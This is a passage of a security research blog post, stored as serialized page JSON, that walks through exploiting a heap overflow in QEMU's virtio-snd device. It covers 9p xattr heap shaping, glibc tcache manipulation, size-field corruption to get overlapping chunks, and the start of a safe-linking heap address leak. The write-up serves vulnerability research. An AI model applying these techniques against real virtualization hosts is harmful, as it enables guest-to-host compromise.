",{"type":24,"tag":301,"props":134901,"children":134902},{"style":385},[134903],{"type":30,"value":556},{"type":24,"tag":301,"props":134905,"children":134906},{"style":359},[134907],{"type":30,"value":133653},{"type":24,"tag":301,"props":134909,"children":134910},{"style":385},[134911],{"type":30,"value":556},{"type":24,"tag":301,"props":134913,"children":134914},{"style":359},[134915],{"type":30,"value":134916},"flags);\n",{"type":24,"tag":301,"props":134918,"children":134919},{"class":303,"line":635},[134920,134924,134929,134933,134937],{"type":24,"tag":301,"props":134921,"children":134922},{"style":308},[134923],{"type":30,"value":453},{"type":24,"tag":301,"props":134925,"children":134926},{"style":359},[134927],{"type":30,"value":134928}," (err ",{"type":24,"tag":301,"props":134930,"children":134931},{"style":385},[134932],{"type":30,"value":1849},{"type":24,"tag":301,"props":134934,"children":134935},{"style":466},[134936],{"type":30,"value":685},{"type":24,"tag":301,"props":134938,"children":134939},{"style":359},[134940],{"type":30,"value":398},{"type":24,"tag":301,"props":134942,"children":134943},{"class":303,"line":643},[134944,134949],{"type":24,"tag":301,"props":134945,"children":134946},{"style":308},[134947],{"type":30,"value":134948}," goto",{"type":24,"tag":301,"props":134950,"children":134951},{"style":359},[134952],{"type":30,"value":134953}," out_nofid;\n",{"type":24,"tag":301,"props":134955,"children":134956},{"class":303,"line":652},[134957],{"type":24,"tag":301,"props":134958,"children":134959},{"style":359},[134960],{"type":30,"value":501},{"type":24,"tag":301,"props":134962,"children":134963},{"class":303,"line":666},[134964],{"type":24,"tag":301,"props":134965,"children":134966},{"emptyLinePlaceholder":16},[134967],{"type":30,"value":341},{"type":24,"tag":301,"props":134969,"children":134970},{"class":303,"line":674},[134971],{"type":24,"tag":301,"props":134972,"children":134973},{"style":359},[134974],{"type":30,"value":111495},{"type":24,"tag":301,"props":134976,"children":134977},{"class":303,"line":692},[134978],{"type":24,"tag":301,"props":134979,"children":134980},{"emptyLinePlaceholder":16},[134981],{"type":30,"value":341},{"type":24,"tag":301,"props":134983,"children":134984},{"class":303,"line":3631},[134985,134989,134993,134997],{"type":24,"tag":301,"props":134986,"children":134987},{"style":308},[134988],{"type":30,"value":453},{"type":24,"tag":301,"props":134990,"children":134991},{"style":359},[134992],{"type":30,"value":133754},{"type":24,"tag":301,"props":134994,"children":134995},{"style":385},[134996],{"type":30,"value":1456},{"type":24,"tag":301,"props":134998,"children":134999},{"style":359},[135000],{"type":30,"value":135001}," P9_XATTR_SIZE_MAX) {\n",{"type":24,"tag":301,"props":135003,"children":135004},{"class":303,"line":3639},[135005,135010,135014,135018],{"type":24,"tag":301,"props":135006,"children":135007},{"style":359},[135008],{"type":30,"value":135009}," err ",{"type":24,"tag":301,"props":135011,"children":135012},{"style":385},[135013],{"type":30,"value":523},{"type":24,"tag":301,"props":135015,"children":135016},{"style":385},[135017],{"type":30,"value":3407},{"type":24,"tag":301,"props":135019,"children":135020},{"style":359},[135021],{"type":30,"value":135022},"E2BIG;\n",{"type":24,"tag":301,"props":135024,"children":135025},{"class":303,"line":3647},[135026,135030],{"type":24,"tag":301,"props":135027,"children":135028},{"style":308},[135029],{"type":30,"value":134948},{"type":24,"tag":301,"props":135031,"children":135032},{"style":359},[135033],{"type":30,"value":134953},{"type":24,"tag":301,"props":135035,"children":135036},{"class":303,"line":3685},[135037],{"type":24,"tag":301,"props":135038,"children":135039},{"style":359},[135040],{"type":30,"value":501},{"type":24,"tag":301,"props":135042,"children":135043},{"class":303,"line":3713},[135044],{"type":24,"tag":301,"props":135045,"children":135046},{"emptyLinePlaceholder":16},[135047],{"type":30,"value":341},{"type":24,"tag":301,"props":135049,"children":135050},{"class":303,"line":3721},[135051],{"type":24,"tag":301,"props":135052,"children":135053},{"style":359},[135054],{"type":30,"value":111495},{"type":24,"tag":301,"props":135056,"children":135057},{"class":303,"line":3751},[135058],{"type":24,"tag":301,"props":135059,"children":135060},{"emptyLinePlaceholder":16},[135061],{"type":30,"value":341},{"type":24,"tag":301,"props":135063,"children":135064},{"class":303,"line":3782},[135065,135069,135073,135077,135082,135086,135090,135094,135099,135103,135107],{"type":24,"tag":301,"props":135066,"children":135067},{"style":314},[135068],{"type":30,"value":134837},{"type":24,"tag":301,"props":135070,"children":135071},{"style":359},[135072],{"type":30,"value":362},{"type":24,"tag":301,"props":135074,"children":135075},{"style":385},[135076],{"type":30,"value":556},{"type":24,"tag":301,"props":135078,"children":135079},{"style":369},[135080],{"type":30,"value":135081},"xattr_fidp",{"type":24,"tag":301,"props":135083,"children":135084},{"style":359},[135085],{"type":30,"value":882},{"type":24,"tag":301,"props":135087,"children":135088},{"style":369},[135089],{"type":30,"value":43724},{"type":24,"tag":301,"props":135091,"children":135092},{"style":359},[135093],{"type":30,"value":206},{"type":24,"tag":301,"props":135095,"children":135096},{"style":369},[135097],{"type":30,"value":135098},"xattr",{"type":24,"tag":301,"props":135100,"children":135101},{"style":359},[135102],{"type":30,"value":206},{"type":24,"tag":301,"props":135104,"children":135105},{"style":369},[135106],{"type":30,"value":55232},{"type":24,"tag":301,"props":135108,"children":135109},{"style":359},[135110],{"type":30,"value":589},{"type":24,"tag":301,"props":135112,"children":135113},{"class":303,"line":3791},[135114,135119,135123,135127,135131,135135,135139,135143,135147,135151,135155,135159,135163],{"type":24,"tag":301,"props":135115,"children":135116},{"style":314},[135117],{"type":30,"value":135118}," v9fs_string_copy",{"type":24,"tag":301,"props":135120,"children":135121},{"style":359},[135122],{"type":30,"value":362},{"type":24,"tag":301,"props":135124,"children":135125},{"style":385},[135126],{"type":30,"value":556},{"type":24,"tag":301,"props":135128,"children":135129},{"style":369},[135130],{"type":30,"value":135081},{"type":24,"tag":301,"props":135132,"children":135133},{"style":359},[135134],{"type":30,"value":882},{"type":24,"tag":301,"props":135136,"children":135137},{"style":369},[135138],{"type":30,"value":43724},{"type":24,"tag":301,"props":135140,"children":135141},{"style":359},[135142],{"type":30,"value":206},{"type":24,"tag":301,"props":135144,"children":135145},{"style":369},[135146],{"type":30,"value":135098},{"type":24,"tag":301,"props":135148,"children":135149},{"style":359},[135150],{"type":30,"value":206},{"type":24,"tag":301,"props":135152,"children":135153},{"style":369},[135154],{"type":30,"value":55232},{"type":24,"tag":301,"props":135156,"children":135157},{"style":359},[135158],{"type":30,"value":377},{"type":24,"tag":301,"props":135160,"children":135161},{"style":385},[135162],{"type":30,"value":556},{"type":24,"tag":301,"props":135164,"children":135165},{"style":359},[135166],{"type":30,"value":134850},{"type":24,"tag":301,"props":135168,"children":135169},{"class":303,"line":3819},[135170,135175,135179,135183,135187,135191,135195,135199,135203,135207],{"type":24,"tag":301,"props":135171,"children":135172},{"style":369},[135173],{"type":30,"value":135174}," xattr_fidp",{"type":24,"tag":301,"props":135176,"children":135177},{"style":359},[135178],{"type":30,"value":882},{"type":24,"tag":301,"props":135180,"children":135181},{"style":369},[135182],{"type":30,"value":43724},{"type":24,"tag":301,"props":135184,"children":135185},{"style":359},[135186],{"type":30,"value":206},{"type":24,"tag":301,"props":135188,"children":135189},{"style":369},[135190],{"type":30,"value":135098},{"type":24,"tag":301,"props":135192,"children":135193},{"style":359},[135194],{"type":30,"value":206},{"type":24,"tag":301,"props":135196,"children":135197},{"style":369},[135198],{"type":30,"value":5958},{"type":24,"tag":301,"props":135200,"children":135201},{"style":385},[135202],{"type":30,"value":2537},{"type":24,"tag":301,"props":135204,"children":135205},{"style":314},[135206],{"type":30,"value":130862},{"type":24,"tag":301,"props":135208,"children":135209},{"style":359},[135210],{"type":30,"value":135211},"(size);\n",{"type":24,"tag":301,"props":135213,"children":135214},{"class":303,"line":4397},[135215],{"type":24,"tag":301,"props":135216,"children":135217},{"style":359},[135218],{"type":30,"value":698},{"type":24,"tag":32,"props":135220,"children":135221},{},[135222,135224,135229,135231,135236,135237,135242,135244,135249],{"type":30,"value":135223},"Because the ",{"type":24,"tag":145,"props":135225,"children":135227},{"className":135226},[],[135228],{"type":30,"value":134585},{"type":30,"value":135230}," field is handled as a string, embedded null bytes are not preserved, which makes it less useful for our purposes. It also introduces some extra allocation noise into the heap, since creating an xattr allocates both ",{"type":24,"tag":145,"props":135232,"children":135234},{"className":135233},[],[135235],{"type":30,"value":134585},{"type":30,"value":2378},{"type":24,"tag":145,"props":135238,"children":135240},{"className":135239},[],[135241],{"type":30,"value":134592},{"type":30,"value":135243},", not just the ",{"type":24,"tag":145,"props":135245,"children":135247},{"className":135246},[],[135248],{"type":30,"value":134592},{"type":30,"value":135250}," we actually care about. But we will get around this later in the blog post.",{"type":24,"tag":32,"props":135252,"children":135253},{},[135254,135255,135260],{"type":30,"value":8079},{"type":24,"tag":145,"props":135256,"children":135258},{"className":135257},[],[135259],{"type":30,"value":134592},{"type":30,"value":135261}," field, however, is much more interesting: it gives us a guest-controlled heap allocation of an arbitrary size. Each of these allocations is tied to its own xattr FID, which means it stays alive for as long as that FID remains live. In practice, this gives us a large number of persistent host-side heap objects that we can manage individually.",{"type":24,"tag":32,"props":135263,"children":135264},{},[135265,135267,135272,135274,135280,135282,135288,135290,135296],{"type":30,"value":135266},"Once allocated, we can write arbitrary bytes into the ",{"type":24,"tag":145,"props":135268,"children":135270},{"className":135269},[],[135271],{"type":30,"value":134592},{"type":30,"value":135273}," buffer through a ",{"type":24,"tag":145,"props":135275,"children":135277},{"className":135276},[],[135278],{"type":30,"value":135279},"P9_TWRITE",{"type":30,"value":135281}," request on the corresponding xattr FID. We can also read the contents back with ",{"type":24,"tag":145,"props":135283,"children":135285},{"className":135284},[],[135286],{"type":30,"value":135287},"P9_TREAD",{"type":30,"value":135289},", which is useful later when turning overlap into stronger primitives. Finally, we can free any individual allocation at any time by issuing a ",{"type":24,"tag":145,"props":135291,"children":135293},{"className":135292},[],[135294],{"type":30,"value":135295},"P9_TCLUNK",{"type":30,"value":135297}," request on that same FID.",{"type":24,"tag":32,"props":135299,"children":135300},{},[135301,135303,135309],{"type":30,"value":135302},"This gives us a very strong heap shaping primitive in QEMU - allocate on demand, choose the size precisely (up to ",{"type":24,"tag":145,"props":135304,"children":135306},{"className":135305},[],[135307],{"type":30,"value":135308},"65536",{"type":30,"value":135310}," bytes, which is more than enough here), fully control the contents of the allocation, keep it alive as long as needed, and free it selectively later.",{"type":24,"tag":80,"props":135312,"children":135314},{"id":135313},"setting-the-heap-layout",[135315],{"type":30,"value":135316},"Setting the Heap Layout",{"type":24,"tag":32,"props":135318,"children":135319},{},[135320,135322,135327],{"type":30,"value":135321},"Ideally, we want a contiguous heap region consisting only of ",{"type":24,"tag":145,"props":135323,"children":135325},{"className":135324},[],[135326],{"type":30,"value":134592},{"type":30,"value":135328}," allocations, like this:",{"type":24,"tag":291,"props":135330,"children":135332},{"code":135331}," 0x200 0x200 0x200 0x200 0x200\n+----------+----------+----------+----------+----------+\n| | | | | |\n| .value A | .value B | .value C | .value D | .value E |\n| | | | | |\n+----------+----------+----------+----------+----------+\n",[135333],{"type":24,"tag":145,"props":135334,"children":135335},{"__ignoreMap":7},[135336],{"type":30,"value":135331},{"type":24,"tag":32,"props":135338,"children":135339},{},[135340,135342,135347,135349,135354,135356,135361],{"type":30,"value":135341},"This lets us later create holes by freeing every other ",{"type":24,"tag":145,"props":135343,"children":135345},{"className":135344},[],[135346],{"type":30,"value":134592},{"type":30,"value":135348}," allocation. Those freed chunks enter the freelist, allowing the overflowing virtio-snd buffer to be allocated into one of those holes and overflow into the ",{"type":24,"tag":145,"props":135350,"children":135352},{"className":135351},[],[135353],{"type":30,"value":3219},{"type":30,"value":135355}," field of the next live ",{"type":24,"tag":145,"props":135357,"children":135359},{"className":135358},[],[135360],{"type":30,"value":134592},{"type":30,"value":135362}," chunk.",{"type":24,"tag":32,"props":135364,"children":135365},{},[135366],{"type":30,"value":135367},"Of course, we do not know the initial state of the heap. In practice, it is fragmented and already contains many freelist entries. Fortunately, this is not a problem for glibc, since the allocator is deterministic. By allocating enough chunks of the size we want, malloc will first consume any suitable entries already present in the freelist. Once those are exhausted, subsequent allocations will be served from the top chunk in a contiguous fashion, giving us the continuous region we need.",{"type":24,"tag":32,"props":135369,"children":135370},{},[135371,135373,135378,135380,135385,135387,135392,135394,135399],{"type":30,"value":135372},"As mentioned earlier, ",{"type":24,"tag":145,"props":135374,"children":135376},{"className":135375},[],[135377],{"type":30,"value":134629},{"type":30,"value":135379}," always allocates two chunks: one for ",{"type":24,"tag":145,"props":135381,"children":135383},{"className":135382},[],[135384],{"type":30,"value":134585},{"type":30,"value":135386}," and one for ",{"type":24,"tag":145,"props":135388,"children":135390},{"className":135389},[],[135391],{"type":30,"value":134592},{"type":30,"value":135393},". We want to avoid having ",{"type":24,"tag":145,"props":135395,"children":135397},{"className":135396},[],[135398],{"type":30,"value":134585},{"type":30,"value":135400}," chunks inside our main contiguous region. There are two ways to approach this:",{"type":24,"tag":6246,"props":135402,"children":135403},{},[135404,135416],{"type":24,"tag":2659,"props":135405,"children":135406},{},[135407,135409,135414],{"type":30,"value":135408},"Make ",{"type":24,"tag":145,"props":135410,"children":135412},{"className":135411},[],[135413],{"type":30,"value":134585},{"type":30,"value":135415}," larger than the mmap threshold, so it is allocated from a separate mapping rather than from the main heap. This would give us the layout we want, but at the cost of dramatically increasing memory usage during heap spraying.",{"type":24,"tag":2659,"props":135417,"children":135418},{},[135419,135421,135426,135428,135433,135435,135440],{"type":30,"value":135420},"Prepare a separate region whose sole purpose is to absorb ",{"type":24,"tag":145,"props":135422,"children":135424},{"className":135423},[],[135425],{"type":30,"value":134585},{"type":30,"value":135427},"-sized allocations. Later, when we start building the main contiguous region, malloc will satisfy ",{"type":24,"tag":145,"props":135429,"children":135431},{"className":135430},[],[135432],{"type":30,"value":134585},{"type":30,"value":135434}," allocations from that separate freelist instead of placing them next to our ",{"type":24,"tag":145,"props":135436,"children":135438},{"className":135437},[],[135439],{"type":30,"value":134592},{"type":30,"value":135441}," chunks.",{"type":24,"tag":270,"props":135443,"children":135445},{"id":135444},"separating-name-allocations",[135446],{"type":30,"value":135447},"Separating .name allocations",{"type":24,"tag":32,"props":135449,"children":135450},{},[135451,135453,135458,135460,135465],{"type":30,"value":135452},"We chose the second option. However, it is not as simple as issuing ",{"type":24,"tag":145,"props":135454,"children":135456},{"className":135455},[],[135457],{"type":30,"value":134629},{"type":30,"value":135459}," for N ",{"type":24,"tag":145,"props":135461,"children":135463},{"className":135462},[],[135464],{"type":30,"value":134585},{"type":30,"value":135466},"-sized allocations and then freeing them.",{"type":24,"tag":32,"props":135468,"children":135469},{},[135470,135472,135477,135478,135483,135484,135489,135491,135496,135498,135503],{"type":30,"value":135471},"At this point, we already know that ",{"type":24,"tag":145,"props":135473,"children":135475},{"className":135474},[],[135476],{"type":30,"value":134629},{"type":30,"value":135379},{"type":24,"tag":145,"props":135479,"children":135481},{"className":135480},[],[135482],{"type":30,"value":134585},{"type":30,"value":135386},{"type":24,"tag":145,"props":135485,"children":135487},{"className":135486},[],[135488],{"type":30,"value":134592},{"type":30,"value":135490},". If we simply call it with ",{"type":24,"tag":145,"props":135492,"children":135494},{"className":135493},[],[135495],{"type":30,"value":134592},{"type":30,"value":135497}," sized the same as ",{"type":24,"tag":145,"props":135499,"children":135501},{"className":135500},[],[135502],{"type":30,"value":134585},{"type":30,"value":135504},", we get a layout like this:",{"type":24,"tag":291,"props":135506,"children":135508},{"code":135507}," 0x20 0x20 0x20 0x20 0x20\n+----------+----------+----------+----------+----------+\n| | | | | |\n| .name A | .value A | .name B | .value B | .name C |\n| | | | | |\n+----------+----------+----------+----------+----------+\n",[135509],{"type":24,"tag":145,"props":135510,"children":135511},{"__ignoreMap":7},[135512],{"type":30,"value":135507},{"type":24,"tag":32,"props":135514,"children":135515},{},[135516,135518,135523,135525,135531,135533,135539,135541,135546,135548,135553,135555,135560],{"type":30,"value":135517},"With that heap state, issuing a ",{"type":24,"tag":145,"props":135519,"children":135521},{"className":135520},[],[135522],{"type":30,"value":135295},{"type":30,"value":135524}," request would first free ",{"type":24,"tag":145,"props":135526,"children":135528},{"className":135527},[],[135529],{"type":30,"value":135530},".name A",{"type":30,"value":135532}," and then ",{"type":24,"tag":145,"props":135534,"children":135536},{"className":135535},[],[135537],{"type":30,"value":135538},".value A",{"type":30,"value":135540},". When ",{"type":24,"tag":145,"props":135542,"children":135544},{"className":135543},[],[135545],{"type":30,"value":135538},{"type":30,"value":135547}," is freed, the allocator sees that the preceding chunk ",{"type":24,"tag":145,"props":135549,"children":135551},{"className":135550},[],[135552],{"type":30,"value":135530},{"type":30,"value":135554}," is already free and immediately consolidates the two. As a result, instead of ending up with many reusable ",{"type":24,"tag":145,"props":135556,"children":135558},{"className":135557},[],[135559],{"type":30,"value":134585},{"type":30,"value":135561},"-sized chunks in the freelist, we would just create a large consolidated free chunk, which is not what we want.",{"type":24,"tag":32,"props":135563,"children":135564},{},[135565],{"type":30,"value":135566},"To avoid that, we take advantage of the fact that chunks freed into tcache are not consolidated. It is also important to note that tcache maintains a separate freelist for each size class within the tcache range, and in this glibc version each such freelist can hold up to 16 entries.",{"type":24,"tag":32,"props":135568,"children":135569},{},[135570,135572,135577,135579,135584,135586,135591,135593,135598,135600,135605,135607,135613],{"type":30,"value":135571},"We begin by draining the tcache freelist for every relevant size class by allocating 16 chunks of each size. Throughout this process, the ",{"type":24,"tag":145,"props":135573,"children":135575},{"className":135574},[],[135576],{"type":30,"value":134585},{"type":30,"value":135578}," allocation remains fixed at size ",{"type":24,"tag":145,"props":135580,"children":135582},{"className":135581},[],[135583],{"type":30,"value":111761},{"type":30,"value":135585},". We first allocate 16 xattrs whose ",{"type":24,"tag":145,"props":135587,"children":135589},{"className":135588},[],[135590],{"type":30,"value":134592},{"type":30,"value":135592}," size is ",{"type":24,"tag":145,"props":135594,"children":135596},{"className":135595},[],[135597],{"type":30,"value":5928},{"type":30,"value":135599},". After that, we allocate another 16 xattrs, this time with ",{"type":24,"tag":145,"props":135601,"children":135603},{"className":135602},[],[135604],{"type":30,"value":134592},{"type":30,"value":135606}," size ",{"type":24,"tag":145,"props":135608,"children":135610},{"className":135609},[],[135611],{"type":30,"value":135612},"0x40",{"type":30,"value":135614},", and continue in the same way for each tcache size class.",{"type":24,"tag":32,"props":135616,"children":135617},{},[135618],{"type":30,"value":135619},"This yields the following layout:",{"type":24,"tag":291,"props":135621,"children":135623},{"code":135622}," 0x20 0x30 0x20 0x30\n+---------+--------------+---------+--------------+- - - - -\n| | | | |\n| .name A | .value A | .name B | .value B | . . .\n| | | | |\n+---------+--------------+---------+--------------+- - - - -\n\n 0x20 0x40 0x20 0x40\n+---------+------------------+---------+------------------+- - - - -\n| | | | |\n| .name C | .value C | .name D | .value D | . . .\n| | | | |\n+---------+------------------+---------+------------------+- - - - -\n",[135624],{"type":24,"tag":145,"props":135625,"children":135626},{"__ignoreMap":7},[135627],{"type":30,"value":135622},{"type":24,"tag":32,"props":135629,"children":135630},{},[135631,135633,135638,135640,135645,135647,135652,135654,135659,135661,135666,135668,135673,135674,135679,135681,135686,135688,135693,135695,135700,135702,135707,135709,135714],{"type":30,"value":135632},"At this point, we can free all allocations created during this phase. Because we emptied every tcache freelist, the first 16 ",{"type":24,"tag":145,"props":135634,"children":135636},{"className":135635},[],[135637],{"type":30,"value":134585},{"type":30,"value":135639}," chunks end up in the ",{"type":24,"tag":145,"props":135641,"children":135643},{"className":135642},[],[135644],{"type":30,"value":111761},{"type":30,"value":135646}," tcache bin, along with the interleaved ",{"type":24,"tag":145,"props":135648,"children":135650},{"className":135649},[],[135651],{"type":30,"value":134592},{"type":30,"value":135653}," chunks of size ",{"type":24,"tag":145,"props":135655,"children":135657},{"className":135656},[],[135658],{"type":30,"value":5928},{"type":30,"value":135660},". The next 16 ",{"type":24,"tag":145,"props":135662,"children":135664},{"className":135663},[],[135665],{"type":30,"value":134585},{"type":30,"value":135667}," chunks are interleaved with ",{"type":24,"tag":145,"props":135669,"children":135671},{"className":135670},[],[135672],{"type":30,"value":134592},{"type":30,"value":135653},{"type":24,"tag":145,"props":135675,"children":135677},{"className":135676},[],[135678],{"type":30,"value":135612},{"type":30,"value":135680},"; when freed, those ",{"type":24,"tag":145,"props":135682,"children":135684},{"className":135683},[],[135685],{"type":30,"value":134592},{"type":30,"value":135687}," chunks also go into their corresponding tcache bin instead of consolidating with the adjacent free ",{"type":24,"tag":145,"props":135689,"children":135691},{"className":135690},[],[135692],{"type":30,"value":134585},{"type":30,"value":135694}," chunks. Repeating this across all tcache sizes leaves us with a large region of free ",{"type":24,"tag":145,"props":135696,"children":135698},{"className":135697},[],[135699],{"type":30,"value":134585},{"type":30,"value":135701},"-sized chunks that will later be served to the ",{"type":24,"tag":145,"props":135703,"children":135705},{"className":135704},[],[135706],{"type":30,"value":134585},{"type":30,"value":135708}," allocations of the main contiguous spray - leaving us with the desired layout of adjacent ",{"type":24,"tag":145,"props":135710,"children":135712},{"className":135711},[],[135713],{"type":30,"value":134592},{"type":30,"value":135441},{"type":24,"tag":80,"props":135716,"children":135718},{"id":135717},"corrupting-the-size",[135719],{"type":30,"value":135720},"Corrupting the Size",{"type":24,"tag":32,"props":135722,"children":135723},{},[135724,135726,135731,135733,135738,135740,135745,135747,135752,135753,135758],{"type":30,"value":135725},"The input format is guest-controlled, and we choose ",{"type":24,"tag":145,"props":135727,"children":135729},{"className":135728},[],[135730],{"type":30,"value":10249},{"type":30,"value":135732}," (unsigned 8-bit PCM). As noted earlier, silence in ",{"type":24,"tag":145,"props":135734,"children":135736},{"className":135735},[],[135737],{"type":30,"value":10249},{"type":30,"value":135739}," is centered at ",{"type":24,"tag":145,"props":135741,"children":135743},{"className":135742},[],[135744],{"type":30,"value":36196},{"type":30,"value":135746}," (rather than ",{"type":24,"tag":145,"props":135748,"children":135750},{"className":135749},[],[135751],{"type":30,"value":132852},{"type":30,"value":132839},{"type":24,"tag":145,"props":135754,"children":135756},{"className":135755},[],[135757],{"type":30,"value":132830},{"type":30,"value":135759},"), which biases this uncontrolled overflow toward larger byte values and increases the chance that the corrupted size grows.",{"type":24,"tag":32,"props":135761,"children":135762},{},[135763,135765,135770],{"type":30,"value":135764},"As we already concluded, ",{"type":24,"tag":145,"props":135766,"children":135768},{"className":135767},[],[135769],{"type":30,"value":132295},{"type":30,"value":135771}," is called with the amount:",{"type":24,"tag":291,"props":135773,"children":135775},{"code":135774},"MIN(available, (stream->params.period_bytes - buffer->size))\n",[135776],{"type":24,"tag":145,"props":135777,"children":135778},{"__ignoreMap":7},[135779],{"type":30,"value":135774},{"type":24,"tag":32,"props":135781,"children":135782},{},[135783,135785,135790,135792,135797],{"type":30,"value":135784},"And as mentioned earlier, ",{"type":24,"tag":145,"props":135786,"children":135788},{"className":135787},[],[135789],{"type":30,"value":132326},{"type":30,"value":135791}," is fully guest-controlled, so we can set it such that the overflow reaches exactly far enough to overwrite only the lowest byte of the next chunk's ",{"type":24,"tag":145,"props":135793,"children":135795},{"className":135794},[],[135796],{"type":30,"value":3219},{"type":30,"value":65041},{"type":24,"tag":32,"props":135799,"children":135800},{},[135801,135803,135808,135810,135815],{"type":30,"value":135802},"With the desired heap layout of repeated ",{"type":24,"tag":145,"props":135804,"children":135806},{"className":135805},[],[135807],{"type":30,"value":5071},{"type":30,"value":135809},"-sized ",{"type":24,"tag":145,"props":135811,"children":135813},{"className":135812},[],[135814],{"type":30,"value":134592},{"type":30,"value":135816}," chunks in place, we can then free every other one:",{"type":24,"tag":291,"props":135818,"children":135820},{"code":135819}," Free Free\n+----------+----------+----------+----------+----------+\n| |..........| |..........| |\n| .value A |..........| .value C |..........| .value E |\n| |..........| |..........| |\n+----------+----------+----------+----------+----------+\n",[135821],{"type":24,"tag":145,"props":135822,"children":135823},{"__ignoreMap":7},[135824],{"type":30,"value":135819},{"type":24,"tag":32,"props":135826,"children":135827},{},[135828,135830,135835],{"type":30,"value":135829},"We then allocate the overflowing virtio-snd buffer into one of those holes, start the stream, and let it overflow into the size field of the ",{"type":24,"tag":145,"props":135831,"children":135833},{"className":135832},[],[135834],{"type":30,"value":134592},{"type":30,"value":135836}," chunk directly next to it:",{"type":24,"tag":291,"props":135838,"children":135840},{"code":135839}," +----------+\n | | Free\n+----------| buffer |----------+----------+----------+\n| | | |..........| |\n| .value A +----------+ .value C |..........| .value E |\n| | | |..........| |\n+----------+ +----------+----------+----------+\n",[135841],{"type":24,"tag":145,"props":135842,"children":135843},{"__ignoreMap":7},[135844],{"type":30,"value":135839},{"type":24,"tag":32,"props":135846,"children":135847},{},[135848,135850,135855,135857,135862],{"type":30,"value":135849},"After the overflow, the virtio-snd buffer is freed by QEMU. We then refill all of the holes created for the virtio-snd buffer by allocating new ",{"type":24,"tag":145,"props":135851,"children":135853},{"className":135852},[],[135854],{"type":30,"value":5071},{"type":30,"value":135856},"-sized chunks in their place. At that point, we are left with a layout similar to the original one, except that one ",{"type":24,"tag":145,"props":135858,"children":135860},{"className":135859},[],[135861],{"type":30,"value":134592},{"type":30,"value":135863}," chunk now has a corrupted and likely oversized size field:",{"type":24,"tag":291,"props":135865,"children":135867},{"code":135866}," Oversized chunk\n |\n +------+------+\n | |\n v v\n+----------+----------+----------+----------+----------+\n| | | | | |\n| .value A | .value X | .value C | .value Y | .value E |\n| | | | | |\n+----------+----------+----------+----------+----------+\n",[135868],{"type":24,"tag":145,"props":135869,"children":135870},{"__ignoreMap":7},[135871],{"type":30,"value":135866},{"type":24,"tag":32,"props":135873,"children":135874},{},[135875,135877,135882],{"type":30,"value":135876},"At this point, we can free the chunks left over from the initial contiguous spray. Because one chunk now has a corrupted, larger size field, freeing it causes a single oversized chunk to be inserted into one of the tcache bins in the range ",{"type":24,"tag":145,"props":135878,"children":135880},{"className":135879},[],[135881],{"type":30,"value":134509},{"type":30,"value":1679},{"type":24,"tag":291,"props":135884,"children":135886},{"code":135885}," Free\n 0x210-0x2f0\n |\n +------+------+\n Free | | Free\n 0x200 v v 0x200\n+----------+----------+----------+----------+----------+\n|..........| |..........| |..........|\n|..........| .value X |..........| .value Y |..........|\n|..........| |..........| |..........|\n+----------+----------+----------+----------+----------+\n",[135887],{"type":24,"tag":145,"props":135888,"children":135889},{"__ignoreMap":7},[135890],{"type":30,"value":135885},{"type":24,"tag":32,"props":135892,"children":135893},{},[135894,135896,135901],{"type":30,"value":135895},"We then once again fill the remaining holes and recover the oversized chunk by simply allocating every size in the possible range (",{"type":24,"tag":145,"props":135897,"children":135899},{"className":135898},[],[135900],{"type":30,"value":134509},{"type":30,"value":27511},{"type":24,"tag":291,"props":135903,"children":135905},{"code":135904}," .value B\n +-------------+\n | |\n v v\n+----------+----------+----------+--+-------+----------+\n| | | |//| | |\n| .value A | .value X | |//| | .value C |\n| | | |//| | |\n+----------+----------+----------+--+-------+----------+\n ^ ^\n | |\n +----------+\n .value Y\n",[135906],{"type":24,"tag":145,"props":135907,"children":135908},{"__ignoreMap":7},[135909],{"type":30,"value":135904},{"type":24,"tag":32,"props":135911,"children":135912},{},[135913,135915,135921],{"type":30,"value":135914},"After reclaiming it, we use that chunk to overwrite the size of the next chunk again, but this time we set it to ",{"type":24,"tag":145,"props":135916,"children":135918},{"className":135917},[],[135919],{"type":30,"value":135920},"0x400",{"type":30,"value":135922}," - this gives us a chunk that fully overlaps the chunk next to it, leaving us in the following final state:",{"type":24,"tag":291,"props":135924,"children":135926},{"code":135925}," .value Y extended\n |\n +----------+----------+\n | |\n v v\n+----------+----------+----------+----------+----------+\n| | | | | |\n| .value A | .value X | .value B | .value Y | .value C |\n| | | | | |\n+----------+----------+----------+----------+----------+\n",[135927],{"type":24,"tag":145,"props":135928,"children":135929},{"__ignoreMap":7},[135930],{"type":30,"value":135925},{"type":24,"tag":80,"props":135932,"children":135934},{"id":135933},"leaking-a-heap-address",[135935],{"type":30,"value":135936},"Leaking a Heap Address",{"type":24,"tag":32,"props":135938,"children":135939},{},[135940],{"type":30,"value":135941},"We begin by leaking a heap address, since that is the simplest target at this stage. More specifically, we want the address of a heap chunk whose contents we control. Once we have that, we gain a region of memory at a known address with controlled contents, which is useful for placing fake objects or reclaiming the same location with other objects and later inspecting them with an arbitrary read primitive.",{"type":24,"tag":32,"props":135943,"children":135944},{},[135945,135947,135953],{"type":30,"value":135946},"To do this, we abuse the forward (",{"type":24,"tag":145,"props":135948,"children":135950},{"className":135949},[],[135951],{"type":30,"value":135952},"fd",{"type":30,"value":135954},") pointers used by tcache freelists. Modern glibc protects these pointers with a mitigation known as safe-linking. Instead of storing the next free chunk pointer directly, glibc encodes it by XORing it with the address of the current chunk, shifted right by 12:",{"type":24,"tag":291,"props":135956,"children":135958},{"code":135957},"fd = next ^ (curr >> 12)\n",[135959],{"type":24,"tag":145,"props":135960,"children":135961},{"__ignoreMap":7},[135962],{"type":30,"value":135957},{"type":24,"tag":32,"props":135964,"children":135965},{},[135966,135968,135973,135974,135979],{"type":30,"value":135967},"When a tcache bin is empty and a single chunk is inserted into it, ",{"type":24,"tag":145,"props":135969,"children":135971},{"className":135970},[],[135972],{"type":30,"value":64283},{"type":30,"value":5945},{"type":24,"tag":145,"props":135975,"children":135977},{"className":135976},[],[135978],{"type":30,"value":8855},{"type":30,"value":135980}," because there is no following entry. In that case, the encoding becomes:",{"type":24,"tag":291,"props":135982,"children":135984},{"code":135983},"fd = 0 ^ (curr >> 12)\n",[135985],{"type":24,"tag":145,"props":135986,"children":135987},{"__ignoreMap":7},[135988],{"type":30,"value":135983},{"type":24,"tag":32,"props":135990,"children":135991},{},[135992,135994,135999],{"type":30,"value":135993},"So if we free a single chunk into an empty tcache bin, its ",{"type":24,"tag":145,"props":135995,"children":135997},{"className":135996},[],[135998],{"type":30,"value":135952},{"type":30,"value":136000}," field is effectively just the chunk address shifted right by 12.",{"type":24,"tag":32,"props":136002,"children":136003},{},[136004],{"type":30,"value":136005},"In the overlap we 